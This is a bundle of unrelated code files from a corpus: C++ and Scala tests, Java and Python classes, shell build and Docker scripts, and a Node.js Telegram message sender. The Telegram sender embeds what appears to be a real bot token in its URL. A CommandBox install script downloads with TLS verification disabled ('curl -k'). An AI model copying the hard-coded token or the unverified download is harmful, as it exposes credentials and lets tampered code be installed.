}
// We'd really like to set up a proto with the expected values and
// EXPECT_THAT(info, EqualsProto(expected_info)), but EqualsProto is
// unavailable in chromium OS, so do it one field at a time instead.
EXPECT_EQ(info.exec_name(), "fake_exec_name");
EXPECT_EQ(info.prod(), "fake_product");
EXPECT_EQ(info.ver(), "fake_version");
EXPECT_EQ(info.sig(), "fake_sig");
EXPECT_EQ(info.in_progress_integration_test(), "test.Test");
EXPECT_EQ(info.collector(), "fake_collector");
// 8 base fields, plus footext when its backing file exists.
int num_fields = 8;
if (missing_file_ != kTextFile) {
num_fields++;
}
ASSERT_EQ(info.fields_size(), num_fields);
// Fields arrive in a fixed order; walk them with a running index so the
// optional footext entry can be skipped cleanly.
int field_idx = 0;
EXPECT_EQ(info.fields(field_idx).key(), "board");
EXPECT_EQ(info.fields(field_idx).text(), "undefined");
field_idx++;
EXPECT_EQ(info.fields(field_idx).key(), "hwclass");
EXPECT_EQ(info.fields(field_idx).text(), "undefined");
field_idx++;
EXPECT_EQ(info.fields(field_idx).key(), "sig2");
EXPECT_EQ(info.fields(field_idx).text(), "fake_sig");
field_idx++;
EXPECT_EQ(info.fields(field_idx).key(), "image_type");
EXPECT_EQ(info.fields(field_idx).text(), "");
field_idx++;
EXPECT_EQ(info.fields(field_idx).key(), "boot_mode");
EXPECT_EQ(info.fields(field_idx).text(), "missing-crossystem");
field_idx++;
EXPECT_EQ(info.fields(field_idx).key(), "error_type");
EXPECT_EQ(info.fields(field_idx).text(), "fake_error");
field_idx++;
// The guid comes from details.client_id, not upload_var_guid.
EXPECT_EQ(info.fields(field_idx).key(), "guid");
EXPECT_EQ(info.fields(field_idx).text(), "00112233445566778899aabbccddeeff");
field_idx++;
if (missing_file_ != kTextFile) {
EXPECT_EQ(info.fields(field_idx).key(), "footext");
EXPECT_EQ(info.fields(field_idx).text(), "upload_text_contents");
field_idx++;
}
EXPECT_EQ(info.fields(field_idx).key(), "foovar");
EXPECT_EQ(info.fields(field_idx).text(), "bar");
field_idx++;
// The payload always becomes a blob; log/bin attachments only when present.
int num_blobs = 1;
if (missing_file_ != kBinFile) {
num_blobs++;
}
if (missing_file_ != kLogFile) {
num_blobs++;
}
ASSERT_EQ(blobs.size(), num_blobs);
int blob_idx = 0;
EXPECT_EQ(blobs[blob_idx].key(), "upload_file_fake_payload");
EXPECT_EQ(blobs[blob_idx].blob(), "foobar_payload");
EXPECT_EQ(blobs[blob_idx].filename(), payload_file_relative.value());
blob_idx++;
if (missing_file_ != kBinFile) {
EXPECT_EQ(blobs[blob_idx].key(), "foofile");
EXPECT_EQ(blobs[blob_idx].blob(), "upload_file_contents");
EXPECT_EQ(blobs[blob_idx].filename(), file_var_file_relative.value());
blob_idx++;
}
if (missing_file_ != kLogFile) {
EXPECT_EQ(blobs[blob_idx].key(), "log");
EXPECT_EQ(blobs[blob_idx].blob(), "foobar_log");
EXPECT_EQ(blobs[blob_idx].filename(), log_file_relative.value());
blob_idx++;
}
// The core path is reported only when the core exists and fetching is on.
if (missing_file_ != kCoreFile && fetch_core_) {
EXPECT_EQ(core_path, core_file_absolute);
} else {
EXPECT_EQ(core_path, base::FilePath());
}
}
// Run SerializeCrash over the full cross product: absolute vs. relative
// paths x core fetching on/off x each possible missing companion file.
INSTANTIATE_TEST_SUITE_P(CrashSerializerParameterizedTestInstantiation,
CrashSerializerParameterizedTest,
testing::Combine(testing::Bool(),
testing::Bool(),
testing::Values(kNone,
kPayloadFile,
kLogFile,
kTextFile,
kBinFile,
kCoreFile)));
} // namespace crash_serializer
|
<filename>packages/react-topology/src/components/factories/index.ts
// Barrel module: re-exports the factory registration components (and the
// shared './components' module) as the package's public factories entry.
export { default as RegisterComponentFactory } from './RegisterComponentFactory';
export { default as RegisterElementFactory } from './RegisterElementFactory';
export { default as RegisterLayoutFactory } from './RegisterLayoutFactory';
export * from './components';
|
def largest_second_largest(arr):
    """Return the largest and second-largest values of ``arr`` as a tuple.

    Preserves the original contract exactly: an array with fewer than two
    elements yields an explanatory message string instead of a tuple, and a
    duplicated maximum is reported twice (e.g. [5, 5, 1] -> (5, 5)).
    """
    if len(arr) <= 1:
        return "There must be at least two elements in the array"
    # Seed the running top-two from the first pair, then fold in the rest.
    first, second = max(arr[0], arr[1]), min(arr[0], arr[1])
    for value in arr[2:]:
        if value > first:
            first, second = value, first
        elif value > second:
            second = value
    return first, second
package bisondb.cascading;
import cascading.flow.FlowProcess;
import cascading.scheme.Scheme;
import cascading.scheme.SinkCall;
import cascading.scheme.SourceCall;
import cascading.tap.Tap;
import cascading.tuple.Fields;
import cascading.tuple.Tuple;
import bisondb.DomainSpec;
import bisondb.Utils;
import bisondb.document.KeyValDocument;
import bisondb.hadoop.BisonInputFormat;
import bisondb.hadoop.BisonOutputFormat;
import bisondb.hadoop.BisonRecordWritable;
import org.apache.hadoop.io.IntWritable;
import org.apache.hadoop.io.NullWritable;
import org.apache.hadoop.mapred.JobConf;
import org.apache.hadoop.mapred.OutputCollector;
import org.apache.hadoop.mapred.RecordReader;
import java.io.IOException;
/**
 * Cascading {@link Scheme} bridging BisonDB's Hadoop (mapred) input/output
 * formats. Source tuples are (key, value) pairs read via
 * {@link BisonInputFormat}; sink tuples are (shard, key, value) triples
 * written via {@link BisonOutputFormat}, where field 0 selects the shard.
 */
public class BisonScheme extends Scheme<JobConf, RecordReader, OutputCollector, Object[], Object[]> {
// NOTE(review): the DomainSpec parameter is accepted but never stored or
// used -- confirm whether it should be retained for conf initialization.
public BisonScheme(Fields sourceFields, Fields sinkFields, DomainSpec spec) {
setSourceFields(sourceFields);
setSinkFields(sinkFields);
}
/** Configures the job to read through BisonInputFormat. */
@Override public void sourceConfInit(FlowProcess<JobConf> flowProcess,
Tap<JobConf, RecordReader, OutputCollector> tap, JobConf conf) {
conf.setInputFormat(BisonInputFormat.class);
}
/** Configures the job to write IntWritable/BisonRecordWritable pairs. */
@Override public void sinkConfInit(FlowProcess<JobConf> flowProcess,
Tap<JobConf, RecordReader, OutputCollector> tap, JobConf conf) {
conf.setOutputKeyClass(IntWritable.class); // be explicit
conf.setOutputValueClass(BisonRecordWritable.class); // be explicit
conf.setOutputFormat(BisonOutputFormat.class);
}
// Allocate a reusable [key, value] pair once per task so source() can read
// records without per-record allocations.
@Override public void sourcePrepare(FlowProcess<JobConf> flowProcess,
SourceCall<Object[], RecordReader> sourceCall) {
sourceCall.setContext(new Object[2]);
sourceCall.getContext()[0] = sourceCall.getInput().createKey();
sourceCall.getContext()[1] = sourceCall.getInput().createValue();
}
/**
 * Reads the next record into the reusable context objects and emits a
 * (key, value) tuple. Returns false at end of input.
 */
@Override public boolean source(FlowProcess<JobConf> flowProcess,
SourceCall<Object[], RecordReader> sourceCall) throws IOException {
// NOTE(review): assumes BisonInputFormat's record key type is NullWritable
// (created by createKey() above) -- confirm against BisonInputFormat.
NullWritable key = (NullWritable) sourceCall.getContext()[0];
BisonRecordWritable value = (BisonRecordWritable) sourceCall.getContext()[1];
boolean result = sourceCall.getInput().next(key, value);
if (!result)
return false;
sourceCall.getIncomingEntry().setTuple(new Tuple(value.key, value.value));
return true;
}
/**
 * Writes one outgoing tuple: field 0 is the target shard number, fields 1
 * and 2 are the key and value byte arrays.
 */
@Override public void sink(FlowProcess<JobConf> flowProcess,
SinkCall<Object[], OutputCollector> sinkCall) throws IOException {
Tuple tuple = sinkCall.getOutgoingEntry().getTuple();
int shard = tuple.getInteger(0);
Object f1 = tuple.getObject(1);
Object f2 = tuple.getObject(2);
byte[] key = (byte[]) f1;
byte[] val = (byte[]) f2;
KeyValDocument pair = new KeyValDocument(key, val);
sinkCall.getOutput().collect(new IntWritable(shard), new BisonRecordWritable(pair.key, pair.value));
}
}
|
#!/bin/sh
# Run graphql_ppx over a ReasonML source file:
# parse Reason -> binary AST, apply the GraphQL PPX against the schema,
# then print the transformed AST back as Reason source.
# Usage: <script> <file.re> [extra graphql_ppx args...]
file="$1"
shift 1
# Quote "$file" and "$@" so paths/arguments containing spaces survive word
# splitting (previously unquoted, which broke on such inputs).
refmt --parse re --print binary "$file" | graphql_ppx -schema ../graphql_schema.json "$@" /dev/stdin /dev/stdout | refmt --parse binary --print re
|
#!/bin/bash
# -----------------------------------------------------------------------------
# Trivadis - Part of Accenture, Platform Factory - Transactional Data Platform
# Saegereistrasse 29, 8152 Glattbrugg, Switzerland
# -----------------------------------------------------------------------------
# Name.......: buildAllDB.sh
# Author.....: Stefan Oehrli (oes) stefan.oehrli@trivadis.com
# Editor.....: Stefan Oehrli
# Date.......: 2018.03.13
# Revision...:
# Purpose....: Build script to build all trivadis/xxx docker images
# Notes......: Fix: quote all variable expansions passed to docker/cut so
#              values containing spaces cannot be word-split.
# Reference..: --
# License....: Apache License Version 2.0, January 2004 as shown
#              at http://www.apache.org/licenses/
# -----------------------------------------------------------------------------
# Modified...:
# see git revision history for more information on changes/updates
# -----------------------------------------------------------------------------
# - Customization -----------------------------------------------------------
# - End of Customization ----------------------------------------------------
# - Default Values ----------------------------------------------------------
DOCKER_USER=${DOCKER_USER:-"trivadis"}
DOCKER_REPO=${DOCKER_REPO:-"ora_db"}
DOCKER_LOCAL_USER=${DOCKER_LOCAL_USER:-"oracle"}
DOCKER_LOCAL_REPO=${DOCKER_LOCAL_REPO:-"database"}
echo "INFO : Process all ${DOCKER_LOCAL_USER}/${DOCKER_LOCAL_REPO}:* images ...."
# One "repository:tag" entry per line for every matching local image.
ORACLE_IMAGES=$(docker images --filter=reference="${DOCKER_LOCAL_USER}/${DOCKER_LOCAL_REPO}:*" --format "{{.Repository}}:{{.Tag}}")
# lets count the images
n=$(docker images --filter=reference="${DOCKER_LOCAL_USER}/${DOCKER_LOCAL_REPO}:*" --format "{{.Repository}}:{{.Tag}}"|wc -l|sed 's/ *//g')
j=1
for i in ${ORACLE_IMAGES}; do
    # Everything after the first ':' is the tag/version.
    version=$(echo "$i" | cut -d: -f2)
    echo "INFO : push image $j of $n"
    echo "INFO : tag image ${DOCKER_LOCAL_USER}/${DOCKER_LOCAL_REPO}:${version}"
    docker tag "${DOCKER_LOCAL_USER}/${DOCKER_LOCAL_REPO}:${version}" "${DOCKER_USER}/${DOCKER_REPO}:${version}"
    echo "INFO : push image ${DOCKER_USER}/${DOCKER_REPO}:${version}"
    time docker push "${DOCKER_USER}/${DOCKER_REPO}:${version}"
    # Remove the temporary remote-name tag again once pushed.
    echo "INFO : untag image ${DOCKER_USER}/${DOCKER_REPO}:${version}"
    docker rmi "${DOCKER_USER}/${DOCKER_REPO}:${version}"
    ((j++)) # increment counter
done
# --- EOF -------------------------------------------------------------------
<gh_stars>1-10
/*
Copyright (c) 2013, Groupon, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
Neither the name of GROUPON nor the names of its contributors may be
used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package com.groupon.util.xml;
import com.groupon.util.ConfigureException;
import com.groupon.util.NamedObjectFactory;
import org.dom4j.Element;
import java.lang.reflect.ParameterizedType;
/**
* @author <EMAIL>
*/
/**
 * Factory that builds instances of {@code T} from an XML element.
 *
 * Resolution order in {@link #instance}:
 * 1. a "type" attribute, looked up in the registered {@code NamedObjectFactory};
 * 2. a "class" attribute, resolved reflectively (must derive from the
 *    factory's base class);
 * 3. otherwise the configured concrete class, when one was set via
 *    {@link #setConcreteClass}.
 * The created object is additionally configured from the element when it
 * implements {@code XmlConfigurable}.
 */
public class XmlObjectFactory<T> {
    private NamedObjectFactory<T> fKnownTypes;   // registry for the "type" attribute
    private Class<? extends T> fClass;           // base/concrete class used reflectively
    private boolean fbConcreteClass;             // true when fClass may be instantiated directly
    public XmlObjectFactory() {
        // Subclass usage: recover T's runtime class from the generic superclass
        // declaration by walking up to the direct subclass of XmlObjectFactory.
        Class cl = getClass();
        if (cl != XmlObjectFactory.class) {
            for (; cl.getSuperclass() != XmlObjectFactory.class; cl = cl.getSuperclass()) ;
            ParameterizedType type = (ParameterizedType) cl.getGenericSuperclass();
            fClass = (Class) type.getActualTypeArguments()[0];
        }
    }
    public XmlObjectFactory(Class<? extends T> cl) {
        fClass = cl;
    }
    public XmlObjectFactory(NamedObjectFactory<T> types) {
        fKnownTypes = types;
    }
    /** Allows instance() to instantiate {@code cl} when no "type"/"class" attribute is present. */
    public XmlObjectFactory<T> setConcreteClass(Class<? extends T> cl) {
        fClass = cl;
        fbConcreteClass = true;
        return this;
    }
    /**
     * Creates and configures the object described by {@code node}.
     *
     * @throws ConfigureException on unknown "type" values, missing attributes,
     *         incompatible "class" values, or instantiation/configuration failure
     */
    public T instance(Element node) throws ConfigureException {
        String type = node.attributeValue("type");
        T r = null;
        if (type != null) {
            r = fKnownTypes.getNamedObject(type);
            if (r == null) {
                throw new ConfigureException("Unknown type: " + type);
            }
        } else {
            String cls = node.attributeValue("class");
            if (cls == null) {
                if (!fbConcreteClass)
                    throw new ConfigureException("No type or class specified: " + node.asXML());
                try {
                    r = (T) fClass.newInstance();
                } catch (Throwable t) {
                    throw new ConfigureException(t);
                }
            } else {
                try {
                    Class cl = Class.forName(cls);
                    // BUGFIX: was `!cl.isAssignableFrom(cl)`, which compares the loaded
                    // class against itself and is always assignable, so incompatible
                    // classes were never rejected. Validate against the expected base
                    // class instead (matching the error message), guarding against a
                    // null fClass for factories built only from a NamedObjectFactory.
                    if (fClass != null && !fClass.isAssignableFrom(cl)) {
                        throw new ConfigureException("Class must be derived from " + fClass.getName() + ": " + node.asXML());
                    }
                    fClass = cl; // NOTE(review): remembers the last "class" seen; later attribute-less calls instantiate it — confirm intended
                    r = (T) cl.newInstance();
                } catch (Throwable t) {
                    throw new ConfigureException(node.asXML(), t);
                }
            }
        }
        if (r instanceof XmlConfigurable) {
            ((XmlConfigurable) r).configure(node);
        }
        return r;
    }
}
|
<reponame>ArthurVBS/PyRockPaperScissors
#Import - Libs
from tkinter import *
#Function - Assets
def assets(directory):
    """Load the game's images from ``<directory>/Assets``.

    Returns a dict keyed by ``'<name>_dic'`` mapping to tkinter ``PhotoImage``
    objects for rock, paper, scissors and the question-mark placeholder.
    Note: ``PhotoImage`` requires an initialized tkinter root window.
    """
    names = ("rock", "paper", "scissors", "question_mark")
    return {
        f"{name}_dic": PhotoImage(file=f"{directory}/Assets/{name}.png")
        for name in names
    }
|
/*
* Copyright (c) 2013, 2017, Oracle and/or its affiliates. All rights reserved.
* ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*/
package com.sun.webkit.dom;
import org.w3c.dom.html.HTMLLIElement;
/**
 * WebKit binding for the HTML &lt;li&gt; element. All attribute accessors
 * delegate to native WebKit code through the peer pointer held by the
 * superclass; the native method signatures must not be altered.
 */
public class HTMLLIElementImpl extends HTMLElementImpl implements HTMLLIElement {
    HTMLLIElementImpl(long peer) {
        super(peer);
    }

    /** Wraps an existing native peer in the matching Java implementation. */
    static HTMLLIElement getImpl(long peer) {
        return (HTMLLIElement)create(peer);
    }

    // Attributes

    /** List item marker style (the "type" attribute). */
    public String getType() {
        return getTypeImpl(getPeer());
    }
    native static String getTypeImpl(long peer);

    public void setType(String value) {
        setTypeImpl(getPeer(), value);
    }
    native static void setTypeImpl(long peer, String value);

    /** Ordinal value of the list item (the "value" attribute). */
    public int getValue() {
        return getValueImpl(getPeer());
    }
    native static int getValueImpl(long peer);

    public void setValue(int value) {
        setValueImpl(getPeer(), value);
    }
    native static void setValueImpl(long peer, int value);
}
|
#!/bin/bash
# Installs the latest CommandBox Binary
mkdir -p /tmp
# BUGFIX: '-location' is not a valid curl option (it was parsed as the bundled
# short flags '-l -o cation...'); use '--location' so redirects from the
# download host are followed and the archive lands in /tmp/box.zip.
# SECURITY NOTE(review): '-k' disables TLS certificate verification — confirm
# it is really needed for downloads.ortussolutions.com.
curl -k --location -o /tmp/box.zip "https://downloads.ortussolutions.com/ortussolutions/commandbox/${COMMANDBOX_VERSION}/commandbox-bin-${COMMANDBOX_VERSION}.zip"
unzip /tmp/box.zip -d "${BIN_DIR}" && chmod +x "${BIN_DIR}/box"
echo "$(box version) successfully installed"
# Cleanup CommandBox modules which would not be necessary in a Container environment
SYSTEM_EXCLUDES=( "coldbox" "contentbox" "cachebox" "forgebox" "logbox" "games" "wirebox" )
MODULE_EXCLUDES=( "cfscriptme-command" "cb-module-template" )
for mod in "${SYSTEM_EXCLUDES[@]}"
do
  rm -rf "$HOME/.CommandBox/cfml/system/modules_app/${mod}-commands"
done
for mod in "${MODULE_EXCLUDES[@]}"
do
  rm -rf "$HOME/.CommandBox/cfml/modules/${mod}"
done
"$BUILD_DIR"/util/optimize.sh
|
package com.github.lhrb.xml;
import java.util.List;

/**
 * An XML leaf tag: a named element carrying attributes and text content but
 * no child tags. Instances are immutable and obtained via {@link #create}.
 */
public class Leaf implements Tag {
    private final String name;
    private final List<Attribute> attributes;
    private final String text;

    private Leaf(String name, List<Attribute> attributes, String text) {
        this.name = name;
        this.attributes = attributes;
        this.text = text;
    }

    /** Factory method; the constructor stays private so callers depend on Tag. */
    static Tag create(String name, List<Attribute> attributes, String text) {
        return new Leaf(name, attributes, text);
    }

    /**
     * Renders {@code <name attrs>text</name>\n}, indented according to depth.
     */
    @Override
    public String xmlString(Integer depth) {
        String indent = Tag.depthToSpacePrefix(depth);
        String attrs = Tag.attrsToStr(attributes);
        return indent + "<" + name + attrs + ">" + text + "</" + name + ">\n";
    }
}
|
#!/bin/bash
# Update the parent repository: switch to master and pull the latest changes.
# Fail fast: previously a failed `cd` or `git checkout` did not stop the
# script, so `git pull` could run in the wrong directory or on the wrong
# branch. `set -e` aborts on the first failing command instead.
set -e
cd ..
echo "pulling repository on master..."
git checkout master
git pull
|
<filename>modules/jaeger-thrift-http-exporter/src/test/scala/io/janstenpickle/trace4cats/jaeger/JaegerHttpSpanExporterSpec.scala
package io.janstenpickle.trace4cats.jaeger
import cats.effect.{IO, Resource}
import fs2.Chunk
import io.janstenpickle.trace4cats.`export`.SemanticTags
import io.janstenpickle.trace4cats.model.{Batch, TraceProcess}
import io.janstenpickle.trace4cats.test.jaeger.BaseJaegerSpec
import org.http4s.blaze.client.BlazeClientBuilder
import java.time.Instant
// Integration test: verifies that JaegerHttpSpanExporter delivers span batches
// to Jaeger's HTTP collector endpoint (localhost:14268) in a form the query
// side reports back correctly.
class JaegerHttpSpanExporterSpec extends BaseJaegerSpec {
  it should "Send a batch of spans to jaeger" in forAll { (batch: Batch[Chunk], process: TraceProcess) =>
    // Normalize the generated batch: stamp every span with the shared process
    // service name and merged attributes (minus excludedTagKeys — presumably
    // tags the collector rejects; defined in BaseJaegerSpec), and set the time
    // range to "now" so the spans fall inside the query window.
    val updatedBatch =
      Batch(
        batch.spans.map(span =>
          span.copy(
            serviceName = process.serviceName,
            attributes = (process.attributes ++ span.attributes) -- excludedTagKeys,
            start = Instant.now(),
            end = Instant.now()
          )
        )
      )
    // Build a real blaze HTTP client and wrap it in the exporter under test.
    val exporter = BlazeClientBuilder[IO].resource.flatMap { client =>
      Resource.eval(JaegerHttpSpanExporter[IO, Chunk](client, process, "localhost", 14268))
    }
    // Export the batch and compare Jaeger's query response against the
    // expected translation (semantic tags applied, "jaeger" internal format).
    testExporter(
      exporter,
      updatedBatch,
      batchToJaegerResponse(
        updatedBatch,
        process,
        SemanticTags.kindTags,
        SemanticTags.statusTags("span."),
        SemanticTags.processTags,
        internalSpanFormat = "jaeger"
      )
    )
  }
}
|
import json
from typing import Any
class ModelManager:
    """Loads and compares serialized model/config JSON files for tests.

    Holds the paths to the local config and lonestar model files plus the
    base directory for test data, and exposes the expected input/output
    sizes of the lonestar model.
    """

    def __init__(self, local_config_file: str, local_lonestar_model_file: str, TEST_DATA_BASE: str):
        self.local_config_file = local_config_file
        self.local_lonestar_model_file = local_lonestar_model_file
        self.TEST_DATA_BASE = TEST_DATA_BASE
        # Populated lazily by the load_* methods below.
        self.local_config = None
        self.expected_dicebox_serialized_model = None
        self.expected_compiled_model = None
        # Fixed lonestar model dimensions (28x28 inputs, 10 classes).
        self.local_input_size = 784
        self.local_output_size = 10

    def load_local_config_file(self, config_file: str):
        """Load a JSON config file into ``self.local_config``."""
        with open(config_file, "r") as json_file:
            self.local_config = json.load(json_file)

    def load_lonestar_model_file(self, model_file: str):
        """Load the serialized dicebox model JSON into ``self.expected_dicebox_serialized_model``."""
        with open(model_file, "r") as json_file:
            self.expected_dicebox_serialized_model = json.load(json_file)

    def load_compiled_model_file(self, model_file: str):
        """Load the compiled model JSON into ``self.expected_compiled_model``.

        BUGFIX: previously ignored ``model_file`` and always opened
        ``<TEST_DATA_BASE>/lonestar.model.json``; now the given path is used,
        matching the other load_* methods.
        """
        with open(model_file, "r") as json_file:
            self.expected_compiled_model = json.load(json_file)

    def get_input_size(self) -> int:
        """Return the lonestar model's input size (784)."""
        return self.local_input_size

    def get_output_size(self) -> int:
        """Return the lonestar model's output size (10)."""
        return self.local_output_size

    def compare_models(self) -> bool:
        """True when the serialized and compiled models loaded above are identical."""
        return self.expected_dicebox_serialized_model == self.expected_compiled_model
/*******************************************************************************
* This file is part of the Symfony eclipse plugin.
*
* (c) <NAME> <<EMAIL>>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
******************************************************************************/
package com.dubture.symfony.core.model;
/**
 * Value object describing a Symfony resource reference: a path plus a
 * numeric type code and an optional route prefix.
 */
public class Resource {
    /** Type code identifying a routing resource. */
    public static int ROUTE_RESOURCE = 0;

    public String path;
    public int type;
    public String prefix;

    @Override
    public String toString() {
        // Same "path => type" rendering as String.format("%s => %s", path, type).
        return path + " => " + type;
    }
}
|
<filename>src/main/steamworks/index.ts<gh_stars>0
import Steamworks from './steamworks';
export * from './types';
export default Steamworks;
|
#!/bin/bash
# Build deb/rpm packages for the Hologram agent and server using fpm.
# Expects HOLOGRAM_DIR and BIN_DIR to be provided by the calling environment.
source ${HOLOGRAM_DIR}/buildscripts/returncodes.sh
# Derive a package version from the latest git tag via `git describe`.
# NOTE(review): the sed chain rewrites the first '-' to '.', the '-g<hash>'
# separator to '-', and the next '-' to '~' — verify against real tag layouts.
cd ${HOLOGRAM_DIR} && export GIT_TAG=$(git describe --tags --long | sed 's/-/\./' | sed 's/-g/-/' | sed 's/-/~/')
# Rebuild the binaries unless the caller passed --no-compile.
if [ "$1" != "--no-compile" ]; then
    compile_hologram.sh || exit $?
fi
# Staging trees: one package root + scripts dir each for server and agent.
mkdir -p /hologram-build/{server,agent}/root/usr/local/bin
mkdir -p /hologram-build/{server,agent}/root/etc/hologram
mkdir -p /hologram-build/{server,agent}/scripts/
mkdir -p /hologram-build/{server,agent}/root/etc/init.d/
# Copy files needed for the agent package
install -m 0644 ${HOLOGRAM_DIR}/config/agent.json /hologram-build/agent/root/etc/hologram/agent.json
install -m 0755 ${BIN_DIR}/hologram /hologram-build/agent/root/usr/local/bin/
install -m 0755 ${BIN_DIR}/hologram-agent /hologram-build/agent/root/usr/local/bin/
install -m 0755 ${BIN_DIR}/hologram-authorize /hologram-build/agent/root/usr/local/bin/
install -m 0755 ${HOLOGRAM_DIR}/agent/support/linux/after-install_{deb,rpm}.sh /hologram-build/agent/scripts/
install -m 0755 ${HOLOGRAM_DIR}/agent/support/linux/before-remove.sh /hologram-build/agent/scripts/
install -m 0755 ${HOLOGRAM_DIR}/agent/support/linux/init.sh /hologram-build/agent/root/etc/init.d/hologram-agent
# Copy files needed for the server package
install -m 0644 ${HOLOGRAM_DIR}/config/server.json /hologram-build/server/root/etc/hologram/server.json
install -m 0755 ${BIN_DIR}/hologram-server /hologram-build/server/root/usr/local/bin/
install -m 0755 ${HOLOGRAM_DIR}/server/after-install_{deb,rpm}.sh /hologram-build/server/scripts/
install -m 0755 ${HOLOGRAM_DIR}/server/before-remove.sh /hologram-build/server/scripts/
install -m 0755 ${HOLOGRAM_DIR}/server/support/hologram.init.sh /hologram-build/server/root/etc/init.d/hologram-server
ARTIFACTS_DIR=${HOLOGRAM_DIR}/artifacts
mkdir -p ${ARTIFACTS_DIR}
# Package the agent staging tree as both deb and rpm; abort on fpm failure.
cd /hologram-build/agent
for pkg in deb rpm ; do
    fpm -f -s dir -t ${pkg} -n hologram-agent -v ${GIT_TAG} --after-install /hologram-build/agent/scripts/after-install_${pkg}.sh --before-remove /hologram-build/agent/scripts/before-remove.sh --config-files /etc/hologram/agent.json -C /hologram-build/agent/root -p ${ARTIFACTS_DIR}/hologram-${GIT_TAG}.${pkg} -a amd64 . || exit ${ERRLINPKG}
done
# Package the server staging tree the same way.
cd /hologram-build/server
for pkg in deb rpm ; do
    fpm -f -s dir -t ${pkg} -n hologram-server -v ${GIT_TAG} --after-install /hologram-build/server/scripts/after-install_${pkg}.sh --before-remove /hologram-build/server/scripts/before-remove.sh --config-files /etc/hologram/server.json -C /hologram-build/server/root -p ${ARTIFACTS_DIR}/hologram-server-${GIT_TAG}.${pkg} -a amd64 . || exit ${ERRLINPKG}
done
|
import React from 'react';
import stacksData from "../../data/stacks"
import ListItem from "./ListItem"
export default function Stacks(props) {
return (
<div id="development-stacks">
<div className="row">
<div className="col-lg-12">
<p className="lead">
Select a stack to filter related experience and works.
</p>
</div>
</div>
<div className="row">
<div className="col-lg-4">
<ListItem
data={stacksData.backend}
filters={props.filters}
handleSetFilters={props.handleSetFilters} />
</div>
<div className="col-lg-4">
<ListItem
data={stacksData.frontend}
filters={props.filters}
handleSetFilters={props.handleSetFilters} />
</div>
<div className="col-lg-4">
<ListItem
data={stacksData.supports}
filters={props.filters}
handleSetFilters={props.handleSetFilters} />
</div>
</div>
</div>
)
}
|
#!/bin/sh
# Rewrite the i16j* job files to request a 1h limit on the short partition,
# then submit every file in jobs/ via sbatch.
sed -i "s/time=12/time=01/g" jobs/i16j*
sed -i "s/partition=medium/partition=short/g" jobs/i16j*
for file in jobs/*; do
  # Quote "$file" so filenames containing spaces are passed as one argument.
  sbatch "$file"
done
|
<reponame>khaled-11/Botai<gh_stars>0
// Function to get app data
const axios = require ("axios");
module.exports = async (id, name, text) => {
var data;
if (name === "mark"){
data = new TextEncoder().encode(
JSON.stringify({
text:text,
parse_mode:'markdown',
chat_id:id,
protect_content : true
})
)
} else {
data = new TextEncoder().encode(
JSON.stringify({
chat_id:id,
parse_mode:'HTML',
text:`${text}`
})
)
}
const url = `https://api.telegram.org/bot5058153020:AAENUXQeAxlmi_Q1ncTUwNCOoXXLeS4RqwU/sendMessage`;
const OPTIONS = {
headers: {
'Content-Type': 'application/json',
'Content-Length': data.length,
},
}
try {
const ress = await axios.post(url, data, OPTIONS);
console.log(ress.data)
return ('success');
} catch (error) {
console.log(error)
return ('fail');
}
} |
#!/usr/bin/env bash
# Test-matrix driver: runs clippy (warnings as errors) and the test suite
# across the crate's feature-flag combinations. Any extra CLI arguments
# ("$@") are forwarded to every `cargo test` invocation.
set -o xtrace
set -e
# Cap slog logging at info level for all test runs.
LOG_LEVEL="slog/max_level_info"
echo "%%%%%% Testing default features %%%%%%"
cargo clippy --all-targets -- -D warnings
cargo test --features "$LOG_LEVEL" -- "$@"
echo "%%%%%% Finished testing default features %%%%%%"
# these also test without the use_local_executor feature
echo "%%%%%% Testing different ser_id sizes %%%%%%"
cargo clippy --all-targets --no-default-features --features ser_id_8 -- -D warnings
cargo test --no-default-features --features ser_id_8,"$LOG_LEVEL" -- "$@"
cargo test --no-default-features --features ser_id_16,"$LOG_LEVEL" -- "$@"
cargo test --no-default-features --features ser_id_32,"$LOG_LEVEL" -- "$@"
echo "%%%%%% Finished testing different ser_id sizes %%%%%%"
echo "%%%%%% Testing thread pinning %%%%%%"
cargo clippy --all-targets --features thread_pinning -- -D warnings
cargo test --features thread_pinning,"$LOG_LEVEL" -- "$@"
echo "%%%%%% Finished testing thread pinning %%%%%%"
echo "%%%%%% Testing low_latency %%%%%%"
cargo clippy --all-targets --features low_latency -- -D warnings
cargo test --features low_latency,"$LOG_LEVEL" -- "$@"
echo "%%%%%% Finished testing low_latency %%%%%%"
echo "%%%%%% Testing type_erasure %%%%%%"
cargo clippy --all-targets --features type_erasure -- -D warnings
cargo test --features type_erasure,"$LOG_LEVEL" -- "$@"
echo "%%%%%% Finished testing type_erasure %%%%%%"
|
// Graph node that resolves the app's web manifest (manifest.json).
// Emits three edges: 'color' (theme color), 'description', and 'bundle'
// (the manifest JSON); falls back to defaults when no manifest is found.
var debug = require('debug')('bankai.node-manifest')
var parseJson = require('fast-json-parse')
var fs = require('fs')
